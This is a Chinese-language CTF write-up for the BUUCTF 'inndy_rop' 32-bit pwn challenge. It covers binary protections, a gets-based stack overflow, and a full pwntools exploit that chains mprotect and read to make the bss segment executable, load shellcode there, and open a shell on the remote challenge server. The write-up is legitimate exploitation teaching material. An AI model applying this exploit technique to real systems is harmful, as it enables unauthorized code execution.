inndy rop
# inndy rop
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/inndy_rop/rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
overflow函数如下:
int overflow()
{
char v1; // [esp+Ch] [ebp-Ch]
return gets(&v1);
}
1
2
3
4
5
6
2
3
4
5
6
# 链接方式
file rop
rop: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=e9ed96cd1a8ea3af86b7b73048c909236d570d9e, not stripped
1
2
2
静态链接文件
# 思路分析
目前信息:
overflow函数存在任意长度的溢出点- No canary found
- NX enabled
- No PIE
思路:
- 溢出劫持执行流到
mprotect修改bss段的权限,将shellcode写入bss段处,返回并执行获得shell
- 溢出劫持执行流到
# exp
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/inndy_rop/rop'
io = remote('node4.buuoj.cn', 28710)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 0xc+4
mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read']
bss_start = elf.bss() & 0xfffff000 # 页对齐
bss_size = 0x1000
rwx = 7
pop_3times_ret = 0x0806ecd8
payload = flat(['a'*padding, mprotect_addr, pop_3times_ret, bss_start,bss_size, rwx, read_addr, bss_start, 0, bss_start, bss_size])
io.sendline(payload)
shellcode = asm(shellcraft.sh())
io.send(shellcode)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
上次更新: 2022/08/15, 00:29:49